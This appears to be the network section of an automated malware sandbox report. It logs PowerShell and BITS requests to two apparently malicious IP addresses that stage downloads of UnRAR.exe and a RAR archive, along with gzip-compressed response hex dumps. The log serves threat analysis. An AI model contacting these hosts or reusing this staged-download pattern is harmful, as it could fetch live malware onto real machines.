dd 3e ca 73 98 8f 31 c6 f2 3c 94 0a 0e 4a 3c 45 06 5e ce b5 03 75 f6 5a 84 91 82 ad ea 94 06 e6 f8 16 33 b2 87 89 2d 2c fa bd d5 30 9b 99 45 e2 90 c0 b4 f8 ca f3 ef ff 16 5b b9 02 85 9e 98 03 dd 1a 3e 7a 1b 4a 6e ac 19 ae e8 13 bb a2 29 a4 93 97 89 59 7f e9 d3 32 83 3f e1 68 f7 e6 9d b9 45 7b c5 1d a6 19 b4 1d 24 43 02 7f 43 55 43 03 79 55 67 59 24 f7 3d 04 9c 8f d3 de 88 fd 40 fc c8 08 07 ef 0f e9 11 79 7a 82 fb 98 f1 6b 7e 17 a4 34 ea 8b bd 55 0d c4 c5 d0 5e aa e7 35 ab 2e 9f b3 aa bc a0 bb 2e 68 13 e3 6e 4c 56 31 d2 ed 85 a0 2e e9 fb 38 66 ed b9 e7 59 f4 4d b9 08 41 12 56 94 64 6c c3 7b 7c bf f7 e9 45 b9 82 5f 50 9c 83 1f 44 87 df 51 1a a6 1b 33 4e a7 df 6a 3a 1c bb a3 eb 7e 16 02 05 67 25 3c c3 c2 ce 24 99 d8 41 64 89 ff b8 9f 20 17 1d 67 f4 04 00 00 Data Ascii: uT8~n!Rk#$CHHH q;g[]d~y/izZ/KP'_/qwOo]FhO@QSF\Np]Kp\0ex/Z.~,8:oty2y36pQ>?)r6DQqiNgb65w;6xL(cJnu.=A-'Us?Rksqr;?(L<{Fn K40P9PR#MXKu1pB\>`0m)*S_([mrkB{&PLb^KRkI~3!p~q29i~z>s1<J<E^uZ3-,0
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 13:36:51 GMTServer: Apache/2.4.52 (Ubuntu)Access-Control-Allow-Origin: *Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 726Keep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 75 54 df 8f d3 38 10 7e 6e ff 8a 21 07 52 a2 6b 9c 84 b0 ab 23 24 bd 43 0b 48 48 48 20 01 0f 08 dd 83 71 a6 ad f7 1c 3b 67 bb bb 5b d0 fe ef 8c 9d b4 5d 1e 88 94 64 7e 79 e6 9b 99 2f 69 1f bd 7a 7f f5 e9 cb 87 d7 b0 f3 83 5a 2f db f0 02 c5 f5 b6 4b 50 27 c1 80 bc 5f 2f 17 ed 80 9e 83 d8 71 eb d0 77 c9 e7 4f 6f f2 bf 92 93 5d f3 01 bb e4 46 e2 ed 68 ac 4f 40 18 ed 51 53 dc ad ec fd ae eb f1 46 0a cc a3 b2 02 a9 a5 97 5c e5 4e 70 85 5d c5 ca 98 c7 4b af 70 dd 16 d3 9b 0c ce 1f 82 b0 5c 30 65 78 2f f5 b6 5a 2e 7e 2c 17 8b d1 38 3a 6f 74 03 1b 79 87 fd 0b 32 79 33 36 70 51 3e 09 b2 c2 8d 3f 29 de 72 ed 36 c6 0e 0d 44 51 71 8f 69 4e ce 15 84 67 16 62 36 84 35 77 f2 3b 36 f0 f4 d9 78 17 4c c2 28 63 1b f8 a3 ae eb a0 f6 d2 8d 8a 1f a8 a0 c2 e8 e7 4a 6e 75 2e 3d 0e ae 01 41 8d a2 0d e6 2d 27 18 55 19 73 dc 3f 04 0e cc 8d 52 6b b4 73 0b 71 10 e7 72 3b 94 db 9d 3f eb df 8c ed 91 ea 93 0a ce 28 d9 9f 90 4c 9e 3c f6 7b f6 c6 d6 46 6e 09 c8 83 20 4b b5 f7 ee 34 0a ae e5 c0 a7 b9 05 30 50 39 50 52 23 b7 b4 8f 4d 58 09 ce a8 ff f9 0f 0f 1b 4b 0b 75 31 70 42 5c 3e 81 1f f0 60 9a d6 f8 30 ca b2 c7 6d f6 02 ee 29 a2 2a 7f 13 53 5f 9e a3 28 7f 5b cc 8b 6d 9d b0 72 f4 e0 ac e8 92 9d f7 a3 6b 8a 42 98 1e d9 f5 ff 7b b4 07 26 cc 50 4c 62 5e b3 4b f6 8c 0d 52 b3 6b 97 10 49 a6 a3 94 a3 98 e8 d9 7e 33 fd 21 70 a5 ed e5 0d 08 c5 9d eb 92 e3 f4 03 bd 7e 71 1c 97 11 32 91 39 ba 69 7e 7a dd 3e ca 73 98 8f 31 c6 f2 3c 94 0a 0e 4a 3c 45 06 5e ce b5 03 75 f6 5a 84 91 82 ad ea 94 06 e6 f8 16 33 b2 87 89 2d 2c fa bd d5 30 9b 99 45 e2 90 c0 b4 f8 ca f3 ef ff 16 5b b9 02 85 9e 98 03 dd 1a 3e 7a 1b 4a 6e ac 19 ae e8 13 bb a2 29 a4 93 97 89 59 7f e9 d3 32 83 3f e1 68 f7 e6 9d b9 45 7b c5 1d a6 19 b4 1d 24 43 02 7f 43 55 43 03 79 55 67 59 24 f7 3d 04 9c 8f d3 de 88 fd 40 fc c8 08 07 ef 0f e9 11 79 7a 82 fb 98 f1 6b 7e 17 a4 34 ea 8b bd 55 0d c4 c5 d0 5e aa e7 35 ab 2e 9f b3 aa bc a0 bb 2e 68 13 e3 6e 4c 56 31 d2 ed 85 a0 2e e9 fb 38 66 ed b9 e7 59 f4 4d b9 08 41 12 56 94 64 6c c3 7b 7c bf f7 e9 45 b9 82 5f 50 9c 83 1f 44 87 df 51 1a a6 1b 33 4e a7 df 6a 3a 1c bb a3 eb 7e 16 02 05 67 25 3c c3 c2 ce 24 99 d8 41 64 89 ff b8 9f 20 17 1d 67 f4 04 00 00 Data Ascii: uT8~n!Rk#$CHHH q;g[]d~y/izZ/KP'_/qwOo]FhO@QSF\Np]Kp\0ex/Z.~,8:oty2y36pQ>?)r6DQqiNgb65w;6xL(cJnu.=A-'Us?Rksqr;?(L<{Fn K40P9PR#MXKu1pB\>`0m)*S_([mrkB{&PLb^KRkI~3!p~q29i~z>s1<J<E^uZ3-,0
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 13:36:51 GMTServer: Apache/2.4.52 (Ubuntu)Access-Control-Allow-Origin: *Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 6943Keep-Alive: timeout=5, max=95Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 7b db 92 a3 ca 96 d8 f3 9e 88 f9 07 4d 1d 1f 47 f7 51 57 81 40 20 a9 77 75 db 48 20 90 10 17 81 00 49 0e 87 03 10 37 81 b8 24 17 01 13 3b c2 61 7f 80 1f fd e6 6f 98 98 f0 83 63 6c 87 7f 61 9f 5f f0 97 38 75 ab 52 55 5f ce 19 db 52 17 82 cc 75 5f 2b 57 ae 24 b3 9f ff 6e 39 96 d9 c5 44 e9 94 5e db 7c fd db bf 79 3e fd 76 9a d8 2c be 3c 00 f3 e1 dc 02 e2 0c fe 76 e0 e7 b9 05 5e dc 49 cb d8 71 81 f7 e5 81 63 d5 c7 e1 c3 9b 3e 33 6e c1 97 87 a0 02 7b db 72 bc 87 4e 6a 99 1e 30 21 ec be ca bc f2 4b 06 82 2a 05 8f e7 87 4f 9d ca ac bc 2a 6e 1e dd 34 6e c0 97 de 13 fa 42 cb ab bc 06 7c 7d 46 2e bf 7f fb 37 bf 3c 37 95 59 77 1c d0 7c 79 70 bd a8 01 6e 09 00 24 5f 3a 20 ff f2 50 7a 9e ed 7e 46 10 df 05 4f 39 64 18 ef 81 6b b5 e0 29 b5 5a 04 a2 80 d8 05 2e 12 90 4f e4 13 8a a4 ae 8b c4 4d f3 04 7f 1f ce 84 dd d4 a9 6c af e3 3a e9 2b a1 d4 ca c0 d3 71 e7 03 27 3a 13 b9 dc 3e e2 4f 83 a7 de 53 5b 99 4f 47 88 fc 8c 5c 50 6f 32 9f e5 82 0f 90 e8 2f 7f 3a 5d fe fe 74 f9 a5 8d 9d a2 32 3f 77 d0 5f cf 8f 76 9c 65 95 59 bc 3c 27 56 f8 e8 56 87 73 53 62 39 19 70 1e 61 d3 b9 ef b7 0b ad 93 47 3e c1 be 2c 7a 25 5a 82 aa 28 bd cf 9d 1e 8a fe f1 42 e7 a4 f7 63 1e b7 55 13 7d ee 88 0e 34 eb a7 8e 1b 9b ee a3 0b 9c 2a bf a7 f7 96 52 12 a7 75 e1 58 be 99 3d a6 56 63 39 9f 3b 7f 00 d9 e9 7b 21 9b 55 ae dd c4 90 64 de 80 f0 ca 09 de 3d 66 95 03 52 af b2 a0 62 10 cd 6f cd 4b df d1 77 bd 2a 8f 1e af 6e 87 9d f0 0a 9c 4b 67 dc 54 85 f9 58 79 a0 75 df 76 dc 69 13 94 f7 a2 3e 9d e8 c4 95 09 9c 57 81 ff 5f 25 72 ed 18 46 60 02 bc 3d 00 57 98 73 38 de 1b b3 8d c3 c7 5b 23 86 a2 76 f8 ce 77 d8 4b 93 07 42 ef f1 ac d8 5b 95 ae b6 dc 97 50 dd 37 1a 35 56 61 7d ea c0 30 b5 bc 7b ad ce 2a b8 a5 03 a3 fc 16 1a f7 18 ef c3 e9 d1 b3 ec 3b 31 6e a0 ef a9 de 3c 8a 9e 3f bf de 13 48 2c cf b3 da ef d0 b8 1a ea a7 06 ff a1 27 7f ea ff b3 8e 30 d6 f6 d0 aa 6f 59 9e 81 4e 71 ff ca f5 3b b6 fe 36 54 5f cd 7b 53 35 69 20 d0 a5 05 f9 d3 6d 40 39 71 56 f9 ee c9 c1 90 54 e7 4f c8 eb c0 2b e3 ec 24 0e da e9 db 61 67 08 ff 9c 22 89 3f a0 9f 3a d7 7f 4f d8 c7 37 21 d2 7f 0d 86 bb a0 bd 35 7d c7 52 7f 4d f8 fd d0 9a b6 e5 56 97 88 86 59 2c f6 aa e0 6d 28 a5 25 48 eb 93 1a 7f dd 28 f9 ff c7 06 26 6e db bf 8b 90 6b 48 39 37 83 dc ec 71 35 1a fe 8d cd f0 6f 82 ee 5b 1e 4d 9c 80 e6 95 c7 e1 b1 32 33 10 be 0f 9d d3 e0 f8 9e fe f7 e3 f2 2c d7 4f b0 3a 55 5b bc 62 de c6 7d ef 5b a9 f1 77 52 bf 23 63 df 0d e7 53 36 86 69 1d 9c 08 dd e8 dc 8d c6 7b 32 f1 77 c7 eb 5d 7a c9 40 6a 39 f1 c5 43 a6 65 be cf 27 71 76 af f8 25 e4 3f 9f 03 da b5 9a 2a eb fc 21 c7 4f df 5f ef ba 2f e9 e3 0e 44 55 45 02 45 df 80 dc 06 0d 71 4b 8a 7f d9 9b bf c4 66 d5 5e 05 75 ed ca ec f4 dc 0e 9c b7 41 7c 8a 98 fc 34 db 83
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 13:36:52 GMTServer: Apache/2.4.52 (Ubuntu)Access-Control-Allow-Origin: *Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 6943Keep-Alive: timeout=5, max=96Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 7b db 92 a3 ca 96 d8 f3 9e 88 f9 07 4d 1d 1f 47 f7 51 57 81 40 20 a9 77 75 db 48 20 90 10 17 81 00 49 0e 87 03 10 37 81 b8 24 17 01 13 3b c2 61 7f 80 1f fd e6 6f 98 98 f0 83 63 6c 87 7f 61 9f 5f f0 97 38 75 ab 52 55 5f ce 19 db 52 17 82 cc 75 5f 2b 57 ae 24 b3 9f ff 6e 39 96 d9 c5 44 e9 94 5e db 7c fd db bf 79 3e fd 76 9a d8 2c be 3c 00 f3 e1 dc 02 e2 0c fe 76 e0 e7 b9 05 5e dc 49 cb d8 71 81 f7 e5 81 63 d5 c7 e1 c3 9b 3e 33 6e c1 97 87 a0 02 7b db 72 bc 87 4e 6a 99 1e 30 21 ec be ca bc f2 4b 06 82 2a 05 8f e7 87 4f 9d ca ac bc 2a 6e 1e dd 34 6e c0 97 de 13 fa 42 cb ab bc 06 7c 7d 46 2e bf 7f fb 37 bf 3c 37 95 59 77 1c d0 7c 79 70 bd a8 01 6e 09 00 24 5f 3a 20 ff f2 50 7a 9e ed 7e 46 10 df 05 4f 39 64 18 ef 81 6b b5 e0 29 b5 5a 04 a2 80 d8 05 2e 12 90 4f e4 13 8a a4 ae 8b c4 4d f3 04 7f 1f ce 84 dd d4 a9 6c af e3 3a e9 2b a1 d4 ca c0 d3 71 e7 03 27 3a 13 b9 dc 3e e2 4f 83 a7 de 53 5b 99 4f 47 88 fc 8c 5c 50 6f 32 9f e5 82 0f 90 e8 2f 7f 3a 5d fe fe 74 f9 a5 8d 9d a2 32 3f 77 d0 5f cf 8f 76 9c 65 95 59 bc 3c 27 56 f8 e8 56 87 73 53 62 39 19 70 1e 61 d3 b9 ef b7 0b ad 93 47 3e c1 be 2c 7a 25 5a 82 aa 28 bd cf 9d 1e 8a fe f1 42 e7 a4 f7 63 1e b7 55 13 7d ee 88 0e 34 eb a7 8e 1b 9b ee a3 0b 9c 2a bf a7 f7 96 52 12 a7 75 e1 58 be 99 3d a6 56 63 39 9f 3b 7f 00 d9 e9 7b 21 9b 55 ae dd c4 90 64 de 80 f0 ca 09 de 3d 66 95 03 52 af b2 a0 62 10 cd 6f cd 4b df d1 77 bd 2a 8f 1e af 6e 87 9d f0 0a 9c 4b 67 dc 54 85 f9 58 79 a0 75 df 76 dc 69 13 94 f7 a2 3e 9d e8 c4 95 09 9c 57 81 ff 5f 25 72 ed 18 46 60 02 bc 3d 00 57 98 73 38 de 1b b3 8d c3 c7 5b 23 86 a2 76 f8 ce 77 d8 4b 93 07 42 ef f1 ac d8 5b 95 ae b6 dc 97 50 dd 37 1a 35 56 61 7d ea c0 30 b5 bc 7b ad ce 2a b8 a5 03 a3 fc 16 1a f7 18 ef c3 e9 d1 b3 ec 3b 31 6e a0 ef a9 de 3c 8a 9e 3f bf de 13 48 2c cf b3 da ef d0 b8 1a ea a7 06 ff a1 27 7f ea ff b3 8e 30 d6 f6 d0 aa 6f 59 9e 81 4e 71 ff ca f5 3b b6 fe 36 54 5f cd 7b 53 35 69 20 d0 a5 05 f9 d3 6d 40 39 71 56 f9 ee c9 c1 90 54 e7 4f c8 eb c0 2b e3 ec 24 0e da e9 db 61 67 08 ff 9c 22 89 3f a0 9f 3a d7 7f 4f d8 c7 37 21 d2 7f 0d 86 bb a0 bd 35 7d c7 52 7f 4d f8 fd d0 9a b6 e5 56 97 88 86 59 2c f6 aa e0 6d 28 a5 25 48 eb 93 1a 7f dd 28 f9 ff c7 06 26 6e db bf 8b 90 6b 48 39 37 83 dc ec 71 35 1a fe 8d cd f0 6f 82 ee 5b 1e 4d 9c 80 e6 95 c7 e1 b1 32 33 10 be 0f 9d d3 e0 f8 9e fe f7 e3 f2 2c d7 4f b0 3a 55 5b bc 62 de c6 7d ef 5b a9 f1 77 52 bf 23 63 df 0d e7 53 36 86 69 1d 9c 08 dd e8 dc 8d c6 7b 32 f1 77 c7 eb 5d 7a c9 40 6a 39 f1 c5 43 a6 65 be cf 27 71 76 af f8 25 e4 3f 9f 03 da b5 9a 2a eb fc 21 c7 4f df 5f ef ba 2f e9 e3 0e 44 55 45 02 45 df 80 dc 06 0d 71 4b 8a 7f d9 9b bf c4 66 d5 5e 05 75 ed ca ec f4 dc 0e 9c b7 41 7c 8a 98 fc 34 db 83
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.1Host: 193.169.105.103Connection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Origin: nullAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /in.php HTTP/1.1Host: 193.169.105.103Connection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Origin: nullAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.1Host: 193.169.105.103Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /in.php HTTP/1.1Host: 193.169.105.103Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET //data/background.pdf HTTP/1.1Host: 193.169.105.103Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.1Host: 193.169.105.103Connection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Origin: nullAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.1Host: 193.169.105.103Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /in.php HTTP/1.1Host: 193.169.105.103Connection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Origin: nullAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /in.php HTTP/1.1Host: 193.169.105.103Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.1Host: 193.169.105.103Connection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Origin: nullAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /index.php HTTP/1.1Host: 193.169.105.103Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /in.php HTTP/1.1Host: 193.169.105.103Connection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Origin: nullAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /in.php HTTP/1.1Host: 193.169.105.103Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET //in.php?action=0 HTTP/1.1Host: 193.169.105.103Connection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Origin: nullAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET //in.php?action=0 HTTP/1.1Host: 193.169.105.103Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /in.php?action=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 193.169.105.103Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /in.php?action=2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 193.169.105.103
Source: global trafficHTTP traffic detected: GET /UnRAR.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 22 Nov 2024 15:22:09 GMTRange: bytes=0-1119User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /UnRAR.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 22 Nov 2024 15:22:09 GMTRange: bytes=1120-3202User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /UnRAR.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 22 Nov 2024 15:22:09 GMTRange: bytes=3203-6388User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /UnRAR.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 22 Nov 2024 15:22:09 GMTRange: bytes=6389-15026User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /UnRAR.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 22 Nov 2024 15:22:09 GMTRange: bytes=15027-33176User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /UnRAR.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 22 Nov 2024 15:22:09 GMTRange: bytes=33177-70330User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /UnRAR.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 22 Nov 2024 15:22:09 GMTRange: bytes=70331-127360User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /UnRAR.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 22 Nov 2024 15:22:09 GMTRange: bytes=127361-278546User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /UnRAR.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 22 Nov 2024 15:22:09 GMTRange: bytes=278547-506007User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=0-608183User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=608184-780094User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=780095-1522813User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=1522814-2264336User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=2264337-2491173User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=2491174-3344371User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=3344372-4153307User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=4153308-4924290User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=4924291-5657275User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=5657276-6391362User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=6391363-7125716User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=7125717-7241475User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=7241476-8715681User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=8715682-9605175User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=9605176-10660516User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=10660517-11592201User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=11592202-12442450User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficHTTP traffic detected: GET /jstsolqx.rar HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 01 Dec 2024 22:25:36 GMTRange: bytes=12442451-12488034User-Agent: Microsoft BITS/7.8Host: 194.15.46.189
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: use.fontawesome.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
